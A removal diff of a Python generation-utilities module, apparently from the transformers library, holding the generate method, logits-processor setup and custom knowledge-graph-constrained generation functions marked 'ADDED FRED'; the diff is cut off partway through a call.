0: - processors.append(MinLengthLogitsProcessor(min_length, eos_token_id)) - if prefix_allowed_tokens_fn is not None: - processors.append(PrefixConstrainedLogitsProcessor(prefix_allowed_tokens_fn, num_beams // num_beam_groups)) - if forced_bos_token_id is not None: - processors.append(ForcedBOSTokenLogitsProcessor(forced_bos_token_id)) - if forced_eos_token_id is not None: - processors.append(ForcedEOSTokenLogitsProcessor(max_length, forced_eos_token_id)) - if remove_invalid_values is True: - processors.append(InfNanRemoveLogitsProcessor()) - if exponential_decay_length_penalty is not None: - processors.append( - ExponentialDecayLengthPenalty(exponential_decay_length_penalty, eos_token_id, input_ids_seq_length) - ) - processors = self._merge_criteria_processor_list(processors, logits_processor) - # `LogitNormalization` should always be the last logit processor, when present - if renormalize_logits is True: - processors.append(LogitNormalization()) - return processors - - def _get_stopping_criteria( - self, max_length: Optional[int], max_time: Optional[float], stopping_criteria: Optional[StoppingCriteriaList] - ) -> StoppingCriteriaList: - criteria = StoppingCriteriaList() - if max_length is not None: - criteria.append(MaxLengthCriteria(max_length=max_length)) - if max_time is not None: - criteria.append(MaxTimeCriteria(max_time=max_time)) - criteria = self._merge_criteria_processor_list(criteria, stopping_criteria) - return criteria - - def _merge_criteria_processor_list( - self, - default_list: Union[LogitsProcessorList, StoppingCriteriaList], - custom_list: Union[LogitsProcessorList, StoppingCriteriaList], - ) -> Union[LogitsProcessorList, StoppingCriteriaList]: - if len(custom_list) == 0: - return default_list - for default in default_list: - for custom in custom_list: - if type(custom) is type(default): - object_type = "stopping criteria" if isinstance(custom, StoppingCriteria) else "logits processor" - raise ValueError( - f"A custom {object_type} of type {type(custom)} with values {custom} has been passed to `generate`, " - f"but it has already been created with the values {default}. {default} has been created by passing the " - "corresponding arguments to generate or by the model's config default values. " - f"If you just want to change the default values of {object_type} consider passing them as arguments " - f"to `generate` instead of using a custom {object_type}." - ) - default_list.extend(custom_list) - return default_list - - def compute_transition_beam_scores( - self, - sequences: torch.Tensor, - scores: Tuple[torch.Tensor], - beam_indices: torch.Tensor, - eos_token_id: int = None, - ): - """compute the transition probabilities of sequences given generation - scores and beam indices""" - - # reshape scores as [vocab_size * batch_size, # generation steps] - # with batch_size being 2 * vocab_size and # generation steps being - # seq_len - input_length - scores = torch.stack(scores).reshape(len(scores), -1).transpose(0, 1) - - # start of generated tokens - cut_idx = sequences.shape[-1] - scores.shape[-1] - # adjust for beam indices - beam_sequence_indices = torch.tensor(beam_indices, device=sequences.device) * self.config.vocab_size - # compute real indices - indices = sequences[:, cut_idx:] + beam_sequence_indices - # gather scores and run - transition_scores = scores.gather(0, indices) - # make sure that if EOS token was used before length of sequence `sequence.shape[-1]` - # get first occurence of EOS token - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - - if eos_token_id is not None: - is_eos_token_id = sequences[:, cut_idx:] == eos_token_id - # make sure first eos token still contributes to transition probs - is_eos_token_id[:, -1] = False - is_eos_token_id = is_eos_token_id.roll(1, -1) - # all indices after eos shoud be masked - zero_transition_prob_mask = is_eos_token_id.cumsum(-1).bool() - # zero out padded probs - transition_scores.masked_fill_(zero_transition_prob_mask, 0.0) - - return transition_scores - - # ADDED FRED - def remove_subsets(self, l): - #l = [[1, 2, 4, 8], [1, 2, 4, 5, 6], [1, 2, 3], [2, 3, 21], [1, 2, 3, 4], [1, 2, 3, 4, 5, 6, 7]] - l2 = l[:] - for m in l: - for n in l: - if set(m).issubset(set(n)) and m != n: - l2.remove(m) - break - return l2 - - # ADDED FRED - @torch.no_grad() - def cs_generate( - self, - inputs: Optional[torch.Tensor] = None, - contexts:List[str]=None, #input data - model_input:Dict=None, - max_length: Optional[int] = None, - min_length: Optional[int] = None, - do_sample: Optional[bool] = None, - early_stopping: Optional[bool] = None, - num_beams: Optional[int] = None, - temperature: Optional[float] = None, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - repetition_penalty: Optional[float] = None, - bad_words_ids: Optional[Iterable[int]] = None, - force_words_ids: Optional[Union[Iterable[int], Iterable[Iterable[int]]]] = None, - bos_token_id: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - length_penalty: Optional[float] = None, - no_repeat_ngram_size: Optional[int] = None, - encoder_no_repeat_ngram_size: Optional[int] = None, - num_return_sequences: Optional[int] = None, - max_time: Optional[float] = None, - max_new_tokens: Optional[int] = None, - decoder_start_token_id: Optional[int] = None, - use_cache: Optional[bool] = None, - num_beam_groups: Optional[int] = None, - diversity_penalty: Optional[float] = None, - prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None, - logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), - renormalize_logits: Optional[bool] = None, - stopping_criteria: Optional[StoppingCriteriaList] = StoppingCriteriaList(), - constraints: Optional[List[Constraint]] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - forced_bos_token_id: Optional[int] = None, - forced_eos_token_id: Optional[int] = None, - remove_invalid_values: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - exponential_decay_length_penalty: Optional[Tuple[Union[int, float]]] = None, - use_kg:bool=False, #added - relation_mapper_builder=None, - tokenizer=None, - max_neig_per_concept=1, #it slows down quite a lot - **model_kwargs, - ) -> Union[GreedySearchOutput, SampleOutput, BeamSearchOutput, BeamSampleOutput, torch.LongTensor]: - # print(model_input) - input_ids = model_input['input_ids'] - if "input_commonsense_relations" in model_input: - # print(model_input['input_commonsense_relations'].sum()) - model_kwargs["relation_inputs"] = model_input.get("input_commonsense_relations").to(input_ids.device) - if use_kg: - all_constraints = [] - print('contexts:', contexts[:3]) - for context in contexts: - constraints = [] - print('+++++++') - concepts_from_context = relation_mapper_builder.get_concepts_from_context(context=context, - clear_common_wds=True, alignment=1) - print('concepts_from_context:', concepts_from_context) - useful_concepts = [relation_mapper_builder.swow_knowledge.get_related_concepts(concept) for concept in - concepts_from_context] - if not useful_concepts: - useful_concepts = [relation_mapper_builder.knowledge.get_related_concepts(concept) for concept in concepts_from_context] - useful_concepts = [[f'{phrase}' for phrase in concepts] for concepts in useful_concepts] # add spaces - # useful_concepts = [[phrase for phrase in concepts if len(phrase.split(' ')) == 1] for concepts in useful_concepts] - # useful_concepts = list(itertools.chain.from_iterable(useful_concepts)) - # print('useful_concepts:', useful_concepts[:5]) - print('-------') - print('useful_concepts:', useful_concepts) - if concepts_from_context and useful_concepts: - for context_concept, neighbour_concepts in zip(concepts_from_context, useful_concepts): - print('neighbour:', neighbour_concepts[:5]) - # flexible_words = self.most_similar_words(context_concept, neighbour_concepts) # limit the upperbound - # flexible_words = [word for word in flexible_words if word not in context_concept] # remove input concepts - flexible_words = [word for word in neighbour_concepts if - word not in context_concept] # remove input concepts - print('flexible_words:', flexible_words[:5]) - if not flexible_words: - continue - flexible_words_ids: List[List[int]] = tokenizer(flexible_words, add_special_tokens=False).input_ids #add_prefix_space=True, - flexible_words_ids = self.remove_subsets(flexible_words_ids) - # add_prefix_space=True - # flexible_words_ids = [x for x in flexible_words_ids if len(x) == 1] # problem with subsets - flexible_words_ids = flexible_words_ids[:max_neig_per_concept] - #print('flexible_words_ids:', flexible_words_ids[:3]) - constraint = DisjunctiveConstraint(flexible_words_ids) - constraints.append(constraint) - all_constraints.extend(constraints) - else: - all_constraints = None - - generated_answers_encoded = self.generate(input_ids=input_ids, - #attention_mask=model_input["attention_mask"].to(input_ids.device), - constraints=all_constraints, - min_length=min_length, - #max_length=max_length, - do_sample=do_sample, - early_stopping=early_stopping, - #num_beams=num_beams, - temperature=temperature, - top_k=top_k, - top_p=top_p, - # eos_token_id=tokenizer.eos_token_id, - no_repeat_ngram_size=no_repeat_ngram_size, - num_return_sequences=num_return_sequences, - return_dict_in_generate=return_dict_in_generate, - output_attentions=output_attentions, - output_scores=output_scores, - **model_kwargs, - ) - return generated_answers_encoded - - # ADDED FRED - @torch.no_grad() - def cs_simple_generate( - self, - inputs: Optional[torch.Tensor] = None, - neighbours_contexts:List[List[str]]=None, #input data - model_input:Dict=None, - max_length: Optional[int] = None, - min_length: Optional[int] = None, - do_sample: Optional[bool] = None, - early_stopping: Optional[bool] = None, - num_beams: Optional[int] = None, - temperature: Optional[float] = None, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - repetition_penalty: Optional[float] = None, - bad_words_ids: Optional[Iterable[int]] = None, - force_words_ids: Optional[Union[Iterable[int], Iterable[Iterable[int]]]] = None, - bos_token_id: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - length_penalty: Optional[float] = None, - no_repeat_ngram_size: Optional[int] = None, - encoder_no_repeat_ngram_size: Optional[int] = None, - num_return_sequences: Optional[int] = None, - max_time: Optional[float] = None, - max_new_tokens: Optional[int] = None, - decoder_start_token_id: Optional[int] = None, - use_cache: Optional[bool] = None, - num_beam_groups: Optional[int] = None, - diversity_penalty: Optional[float] = None, - prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None, - logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), - renormalize_logits: Optional[bool] = None, - stopping_criteria: Optional[StoppingCriteriaList] = StoppingCriteriaList(), - constraints: Optional[List[Constraint]] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - forced_bos_token_id: Optional[int] = None, - forced_eos_token_id: Optional[int] = None, - remove_invalid_values: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - exponential_decay_length_penalty: Optional[Tuple[Union[int, float]]] = None, - use_kg:bool=False, #added - relation_mapper_builder=None, - tokenizer=None, - max_concepts=2, #it slows down quite a lot - **model_kwargs, - ) -> Union[GreedySearchOutput, SampleOutput, BeamSearchOutput, BeamSampleOutput, torch.LongTensor]: - # print(model_input) - input_ids = model_input['input_ids'] - if use_kg: - all_constraints = [] - for context_neighbours in neighbours_contexts: - # context_neighbours is a collection of concepts - # lets create sub collections of concepts - context_neighbours = [f' {concept}' for concept in context_neighbours if len(concept) > 3] - n_size_chuncks = len(context_neighbours) // max_concepts - n_size_chuncks = n_size_chuncks if n_size_chuncks > 0 else 1 - sub_concepts_collection = list(get_jump_chunks(context_neighbours, jump=n_size_chuncks)) - constraints = [] - for sub_concepts in sub_concepts_collection[:max_concepts]: - flexible_words_ids: List[List[int]] = tokenizer(sub_concepts, add_special_tokens=False).input_ids #add_prefix_space=True, - #flexible_words_ids = self.remove_subsets(flexible_words_ids) - flexible_words_ids = [[word_ids[0]] for word_ids in flexible_words_ids] - disjunctive_set = list(map(list, set(map(frozenset, flexible_words_ids)))) - - # add_prefix_space=True - # flexible_words_ids = [x for x in flexible_words_ids if len(x) == 1] # problem with subsets - #flexible_words_ids = flexible_words_ids[:max_neig_per_concept] - #print('flexible_words_ids:', flexible_words_ids[:3]) - if not any(disjunctive_set): - continue - constraint = DisjunctiveConstraint(disjunctive_set) - constraints.append(constraint) - if not any(constraints): - constraints=None - all_constraints.append(constraints) - else: - all_constraints = None - if not all_constraints: - all_constraints = None - - generated_answers_encoded = [] - #print('all_constraints:', all_constraints) - for i, contraints in enumerate(all_constraints): - #print('contraints.token_ids:', [x.token_ids for x in contraints]) - if "input_commonsense_relations" in model_input: - # print(model_input['input_commonsense_relations'].sum()) - model_kwargs["relation_inputs"] = model_input.get("input_commonsense_relations")[i].unsqueeze(0).to(input_ids.device) - #print('model_kwargs.get("attention_mask"):', model_kwargs.get("attention_mask")) - model_kwargs["attention_mask"] = model_input.get("attention_mask")[i].unsqueeze(0).to(input_ids.device) - gen = self.generate(input_ids=input_ids[i].unsqueeze(0), - constraints=contraints, - min_length=min_length, - #max_length=max_length, - do_sample=do_sample, - early_stopping=early_stopping, - #num_beams=num_beams, - temperature=temperature, - top_k=top_k, - top_p=top_p, - # eos_token_id=tokenizer.eos_token_id, - no_repeat_ngram_size=no_repeat_ngram_size, - num_return_sequences=num_return_sequences, - return_dict_in_generate=return_dict_in_generate, - output_attentions=output_attentions, - output_scores=output_scores, - **model_kwargs) - #print('[gen]:', gen) - #print(tokenizer.batch_decode(gen)) - generated_answers_encoded.append(gen[0].detach().cpu()) - #torch.LongTensor(generated_answers_encoded) - #print('generated_answers_encoded:', generated_answers_encoded) - return torch.LongTensor(pad_sequence(generated_answers_encoded, batch_first=True, padding_value=tokenizer.pad_token_id)).to(input_ids.device) - - @torch.no_grad() - def generate( - self, - inputs: Optional[torch.Tensor] = None, - max_length: Optional[int] = None, - min_length: Optional[int] = None, - do_sample: Optional[bool] = None, - early_stopping: Optional[bool] = None, - num_beams: Optional[int] = None, - temperature: Optional[float] = None, - top_k: Optional[int] = None, - top_p: Optional[float] = None, - typical_p: Optional[float] = None, - repetition_penalty: Optional[float] = None, - bad_words_ids: Optional[Iterable[int]] = None, - force_words_ids: Optional[Union[Iterable[int], Iterable[Iterable[int]]]] = None, - bos_token_id: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - length_penalty: Optional[float] = None, - no_repeat_ngram_size: Optional[int] = None, - encoder_no_repeat_ngram_size: Optional[int] = None, - num_return_sequences: Optional[int] = None, - max_time: Optional[float] = None, - max_new_tokens: Optional[int] = None, - decoder_start_token_id: Optional[int] = None, - use_cache: Optional[bool] = None, - num_beam_groups: Optional[int] = None, - diversity_penalty: Optional[float] = None, - prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None, - logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), - renormalize_logits: Optional[bool] = None, - stopping_criteria: Optional[StoppingCriteriaList] = StoppingCriteriaList(), - constraints: Optional[List[Constraint]] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - forced_bos_token_id: Optional[int] = None, - forced_eos_token_id: Optional[int] = None, - remove_invalid_values: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - exponential_decay_length_penalty: Optional[Tuple[Union[int, float]]] = None, - **model_kwargs, - ) -> Union[GreedySearchOutput, SampleOutput, BeamSearchOutput, BeamSampleOutput, torch.LongTensor]: - r""" - - Generates sequences of token ids for models with a language modeling head. The method supports the following - generation methods for text-decoder, text-to-text, speech-to-text, and vision-to-text models: - - - *greedy decoding* by calling [`~generation_utils.GenerationMixin.greedy_search`] if `num_beams=1` and - `do_sample=False`. - - *multinomial sampling* by calling [`~generation_utils.GenerationMixin.sample`] if `num_beams=1` and - `do_sample=True`. - - *beam-search decoding* by calling [`~generation_utils.GenerationMixin.beam_search`] if `num_beams>1` and - `do_sample=False`. - - *beam-search multinomial sampling* by calling [`~generation_utils.GenerationMixin.beam_sample`] if - `num_beams>1` and `do_sample=True`. - - *diverse beam-search decoding* by calling [`~generation_utils.GenerationMixin.group_beam_search`], if - `num_beams>1` and `num_beam_groups>1`. - - *constrained beam-search decoding* by calling - [`~generation_utils.GenerationMixin.constrained_beam_search`], if `constraints!=None` or - `force_words_ids!=None`. - - - - Apart from `inputs`, all the arguments below will default to the value of the attribute of the same name as - defined in the model's config (`config.json`) which in turn defaults to the - [`~modeling_utils.PretrainedConfig`] of the model. - - - - Most of these parameters are explained in more detail in [this blog - post](https://huggingface.co/blog/how-to-generate). - - Parameters: - inputs (`torch.Tensor` of varying shape depending on the modality, *optional*): - The sequence used as a prompt for the generation or as model inputs to the encoder. If `None` the - method initializes it with `bos_token_id` and a batch size of 1. For decoder-only models `inputs` - should of in the format of `input_ids`. For encoder-decoder models *inputs* can represent any of - `input_ids`, `input_values`, `input_features`, or `pixel_values`. - max_length (`int`, *optional*, defaults to `model.config.max_length`): - The maximum length of the sequence to be generated. - max_new_tokens (`int`, *optional*, defaults to None): - The maximum numbers of tokens to generate, ignore the current number of tokens. Use either - `max_new_tokens` or `max_length` but not both, they serve the same purpose. - min_length (`int`, *optional*, defaults to 10): - The minimum length of the sequence to be generated. - do_sample (`bool`, *optional*, defaults to `False`): - Whether or not to use sampling ; use greedy decoding otherwise. - early_stopping (`bool`, *optional*, defaults to `False`): - Whether to stop the beam search when at least `num_beams` sentences are finished per batch or not. - num_beams (`int`, *optional*, defaults to 1): - Number of beams for beam search. 1 means no beam search. - temperature (`float`, *optional*, defaults to 1.0): - The value used to module the next token probabilities. - top_k (`int`, *optional*, defaults to 50): - The number of highest probability vocabulary tokens to keep for top-k-filtering. - top_p (`float`, *optional*, defaults to 1.0): - If set to float < 1, only the most probable tokens with probabilities that add up to `top_p` or higher - are kept for generation. - repetition_penalty (`float`, *optional*, defaults to 1.0): - The parameter for repetition penalty. 1.0 means no penalty. See [this - paper](https://arxiv.org/pdf/1909.05858.pdf) for more details. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - bos_token_id (`int`, *optional*): - The id of the *beginning-of-sequence* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - length_penalty (`float`, *optional*, defaults to 1.0): - Exponential penalty to the length. 1.0 means that the beam score is penalized by the sequence length. - 0.0 means no penalty. Set to values < 0.0 in order to encourage the model to generate longer - sequences, to a value > 0.0 in order to encourage the model to produce shorter sequences. - no_repeat_ngram_size (`int`, *optional*, defaults to 0): - If set to int > 0, all ngrams of that size can only occur once. - encoder_no_repeat_ngram_size (`int`, *optional*, defaults to 0): - If set to int > 0, all ngrams of that size that occur in the `encoder_input_ids` cannot occur in the - `decoder_input_ids`. - bad_words_ids(`List[List[int]]`, *optional*): - List of token ids that are not allowed to be generated. In order to get the token ids of the words that - should not appear in the generated text, use `tokenizer(bad_words, add_prefix_space=True, - add_special_tokens=False).input_ids`. - force_words_ids(`List[List[int]]` or `List[List[List[int]]]`, *optional*): - List of token ids that must be generated. If given a `List[List[int]]`, this is treated as a simple - list of words that must be included, the opposite to `bad_words_ids`. If given `List[List[List[int]]]`, - this triggers a [disjunctive constraint](https://github.com/huggingface/transformers/issues/14081), - where one can allow different forms of each word. - num_return_sequences(`int`, *optional*, defaults to 1): - The number of independently computed returned sequences for each element in the batch. - max_time(`float`, *optional*, defaults to None): - The maximum amount of time you allow the computation to run for in seconds. generation will still - finish the current pass after allocated time has been passed. - attention_mask (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values are in `[0, 1]`, 1 for tokens - that are not masked, and 0 for masked tokens. If not provided, will default to a tensor the same shape - as `input_ids` that masks the pad token. [What are attention masks?](../glossary#attention-mask) - decoder_start_token_id (`int`, *optional*): - If an encoder-decoder model starts decoding with a different token than *bos*, the id of that token. - use_cache: (`bool`, *optional*, defaults to `True`): - Whether or not the model should use the past last key/values attentions (if applicable to the model) to - speed up decoding. - num_beam_groups (`int`, *optional*, defaults to 1): - Number of groups to divide `num_beams` into in order to ensure diversity among different groups of - beams. [this paper](https://arxiv.org/pdf/1610.02424.pdf) for more details. - diversity_penalty (`float`, *optional*, defaults to 0.0): - This value is subtracted from a beam's score if it generates a token same as any beam from other group - at a particular time. Note that `diversity_penalty` is only effective if `group beam search` is - enabled. - prefix_allowed_tokens_fn (`Callable[[int, torch.Tensor], List[int]]`, *optional*): - If provided, this function constraints the beam search to allowed tokens only at each step. If not - provided no constraint is applied. This function takes 2 arguments: the batch ID `batch_id` and - `input_ids`. It has to return a list with the allowed tokens for the next generation step conditioned - on the batch ID `batch_id` and the previously generated tokens `inputs_ids`. This argument is useful - for constrained generation conditioned on the prefix, as described in [Autoregressive Entity - Retrieval](https://arxiv.org/abs/2010.00904). - logits_processor (`LogitsProcessorList`, *optional*): - Custom logits processors that complement the default logits processors built from arguments and a - model's config. If a logit processor is passed that is already created with the arguments or a model's - config an error is thrown. This feature is intended for advanced users. - renormalize_logits: (`bool`, *optional*, defaults to `False`): - Whether to renormalize the logits after applying all the logits processors or warpers (including the - custom ones). It's highly recommended to set this flag to `True` as the search algorithms suppose the - score logits are normalized but some logit processors or warpers break the normalization. - stopping_criteria (`StoppingCriteriaList`, *optional*): - Custom stopping criteria that complement the default stopping criteria built from arguments and a - model's config. If a stopping criteria is passed that is already created with the arguments or a - model's config an error is thrown. This feature is intended for advanced users. - constraints (`List[Constraint]`, *optional*): - Custom constraints that can be added to the generation to ensure that the output will contain the use - of certain tokens as defined by `Constraint` objects, in the most sensible way possible. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - forced_bos_token_id (`int`, *optional*): - The id of the token to force as the first generated token after the `decoder_start_token_id`. Useful - for multilingual models like [mBART](../model_doc/mbart) where the first generated token needs to be - the target language token. - forced_eos_token_id (`int`, *optional*): - The id of the token to force as the last generated token when `max_length` is reached. - remove_invalid_values (`bool`, *optional*): - Whether to remove possible *nan* and *inf* outputs of the model to prevent the generation method to - crash. Note that using `remove_invalid_values` can slow down generation. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - exponential_decay_length_penalty (`tuple(int, float)`, *optional*): - This Tuple adds an exponentially increasing length penalty, after a certain amount of tokens have been - generated. The tuple shall consist of: `(start_index, decay_factor)` where `start_index` indicates - where penalty starts and `decay_factor` represents the factor of exponential decay - - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If the model - is an encoder-decoder model, encoder specific kwargs should not be prefixed and decoder specific kwargs - should be prefixed with *decoder_*. - - Return: - [`~utils.ModelOutput`] or `torch.LongTensor`: A [`~utils.ModelOutput`] (if `return_dict_in_generate=True` - or when `config.return_dict_in_generate=True`) or a `torch.FloatTensor`. - - If the model is *not* an encoder-decoder model (`model.config.is_encoder_decoder=False`), the possible - [`~utils.ModelOutput`] types are: - - - [`~generation_utils.GreedySearchDecoderOnlyOutput`], - - [`~generation_utils.SampleDecoderOnlyOutput`], - - [`~generation_utils.BeamSearchDecoderOnlyOutput`], - - [`~generation_utils.BeamSampleDecoderOnlyOutput`] - - If the model is an encoder-decoder model (`model.config.is_encoder_decoder=True`), the possible - [`~utils.ModelOutput`] types are: - - - [`~generation_utils.GreedySearchEncoderDecoderOutput`], - - [`~generation_utils.SampleEncoderDecoderOutput`], - - [`~generation_utils.BeamSearchEncoderDecoderOutput`], - - [`~generation_utils.BeamSampleEncoderDecoderOutput`] - - Examples: - - Greedy Decoding: - - ```python - >>> from transformers import AutoTokenizer, AutoModelForCausalLM - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> prompt = "Today I believe we can finally" - >>> input_ids = tokenizer(prompt, return_tensors="pt").input_ids - - >>> # generate up to 30 tokens - >>> outputs = model.generate(input_ids, do_sample=False, max_length=30) - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Today I believe we can finally get to the point where we can make a difference in the lives of the people of the United States of America.\n'] - ``` - - Multinomial Sampling: - - ```python - >>> from transformers import AutoTokenizer, AutoModelForCausalLM - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> prompt = "Today I believe we can finally" - >>> input_ids = tokenizer(prompt, return_tensors="pt").input_ids - - >>> # sample up to 30 tokens - >>> torch.manual_seed(0) # doctest: +IGNORE_RESULT - >>> outputs = model.generate(input_ids, do_sample=True, max_length=30) - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Today I believe we can finally get rid of discrimination," said Rep. Mark Pocan (D-Wis.).\n\n"Just look at the'] - ``` - - Beam-search decoding: - - ```python - >>> from transformers import AutoTokenizer, AutoModelForSeq2SeqLM - - >>> tokenizer = AutoTokenizer.from_pretrained("Helsinki-NLP/opus-mt-en-de") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("Helsinki-NLP/opus-mt-en-de") - - >>> sentence = "Paris is one of the densest populated areas in Europe." - >>> input_ids = tokenizer(sentence, return_tensors="pt").input_ids - - >>> outputs = model.generate(input_ids) - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Paris ist eines der dichtesten besiedelten Gebiete Europas.'] - ```""" - # 1. Set generation parameters if not already defined - bos_token_id = bos_token_id if bos_token_id is not None else self.config.bos_token_id - num_beams = num_beams if num_beams is not None else self.config.num_beams - length_penalty = length_penalty if length_penalty is not None else self.config.length_penalty - early_stopping = early_stopping if early_stopping is not None else self.config.early_stopping - num_beam_groups = num_beam_groups if num_beam_groups is not None else self.config.num_beam_groups - do_sample = do_sample if do_sample is not None else self.config.do_sample - num_return_sequences = ( - num_return_sequences if num_return_sequences is not None else self.config.num_return_sequences - ) - - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - - if eos_token_id is None and hasattr(self.config, "decoder"): - eos_token_id = self.config.decoder.eos_token_id - - if pad_token_id is None and eos_token_id is not None: - # special case if pad_token_id is not defined - print(f"Setting `pad_token_id` to `eos_token_id`:{eos_token_id} for open-end generation.") - pad_token_id = eos_token_id - - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # 2. Define model inputs - # inputs_tensor has to be defined - # model_input_name is defined if model-specific keyword input is passed - # otherwise model_input_name is None - # all model-specific keyword inputs are removed from `model_kwargs` - inputs_tensor, model_input_name, model_kwargs = self._prepare_model_inputs(inputs, bos_token_id, model_kwargs) - batch_size = inputs_tensor.shape[0] - - # 3. Define other model kwargs - model_kwargs["output_attentions"] = output_attentions - model_kwargs["output_hidden_states"] = output_hidden_states - model_kwargs["use_cache"] = use_cache - - accepts_attention_mask = "attention_mask" in set(inspect.signature(self.forward).parameters.keys()) - requires_attention_mask = "encoder_outputs" not in model_kwargs - - if model_kwargs.get("attention_mask", None) is None and requires_attention_mask and accepts_attention_mask: - model_kwargs["attention_mask"] = self._prepare_attention_mask_for_generation( - inputs_tensor, pad_token_id, eos_token_id - ) - - if self.config.is_encoder_decoder and "encoder_outputs" not in model_kwargs: - # if model is encoder decoder encoder_outputs are created - # and added to `model_kwargs` - model_kwargs = self._prepare_encoder_decoder_kwargs_for_generation( - inputs_tensor, model_kwargs, model_input_name - ) - - # 4. Prepare `input_ids` which will be used for auto-regressive generation - if self.config.is_encoder_decoder: - input_ids = self._prepare_decoder_input_ids_for_generation( - batch_size, - decoder_start_token_id=decoder_start_token_id, - bos_token_id=bos_token_id, - model_kwargs=model_kwargs, - device=inputs_tensor.device, - ) - else: - # if decoder-only then inputs_tensor has to be `input_ids` - input_ids = inputs_tensor - - input_ids_seq_length = input_ids.shape[-1] - - # 5. Prepare `max_length` depending on other stopping criteria - # if `max_new_tokens` is passed, but not `max_length` -> set `max_length = max_new_tokens` - if max_length is None and max_new_tokens is not None: - max_length = max_new_tokens + input_ids_seq_length - elif max_length is not None and max_new_tokens is not None: - # Both are set, this is odd, raise a warning - warnings.warn( - "Both `max_length` and `max_new_tokens` have been set " - f"but they serve the same purpose. `max_length` {max_length} " - f"will take priority over `max_new_tokens` {max_new_tokens}.", - UserWarning, - ) - # default to config if still None - max_length = max_length if max_length is not None else self.config.max_length - min_length = min_length if min_length is not None else self.config.min_length - - if min_length is not None and min_length > max_length: - raise ValueError( - f"Unfeasable length constraints: the minimum length ({min_length}) is larger than the maximum " - f"length ({max_length})" - ) - if input_ids_seq_length >= max_length: - input_ids_string = "decoder_input_ids" if self.config.is_encoder_decoder else "input_ids" - print( - f"Input length of {input_ids_string} is {input_ids_seq_length}, but ``max_length`` is set to {max_length}. " - "This can lead to unexpected behavior. You should consider increasing ``config.max_length`` or ``max_length``." - ) - - # 6. determine generation mode - is_constraint_gen_mode = constraints is not None or force_words_ids is not None - is_greedy_gen_mode = ( - (num_beams == 1) and (num_beam_groups == 1) and do_sample is False and not is_constraint_gen_mode - ) - is_sample_gen_mode = ( - (num_beams == 1) and (num_beam_groups == 1) and do_sample is True and not is_constraint_gen_mode - ) - is_beam_gen_mode = ( - (num_beams > 1) and (num_beam_groups == 1) and do_sample is False and not is_constraint_gen_mode - ) - is_beam_sample_gen_mode = ( - (num_beams > 1) and (num_beam_groups == 1) and do_sample is True and not is_constraint_gen_mode - ) - is_group_beam_gen_mode = (num_beams > 1) and (num_beam_groups > 1) and not is_constraint_gen_mode - - if num_beam_groups > num_beams: - raise ValueError("`num_beam_groups` has to be smaller or equal to `num_beams`") - if is_group_beam_gen_mode and do_sample is True: - raise ValueError( - "Diverse beam search cannot be used in sampling mode. Make sure that `do_sample` is set to `False`." - ) - - # 7. prepare distribution pre_processing samplers - logits_processor = self._get_logits_processor( - repetition_penalty=repetition_penalty, - no_repeat_ngram_size=no_repeat_ngram_size, - encoder_no_repeat_ngram_size=encoder_no_repeat_ngram_size, - input_ids_seq_length=input_ids_seq_length, - encoder_input_ids=inputs_tensor, - bad_words_ids=bad_words_ids, - min_length=min_length, - max_length=max_length, - eos_token_id=eos_token_id, - forced_bos_token_id=forced_bos_token_id, - forced_eos_token_id=forced_eos_token_id, - prefix_allowed_tokens_fn=prefix_allowed_tokens_fn, - num_beams=num_beams, - num_beam_groups=num_beam_groups, - 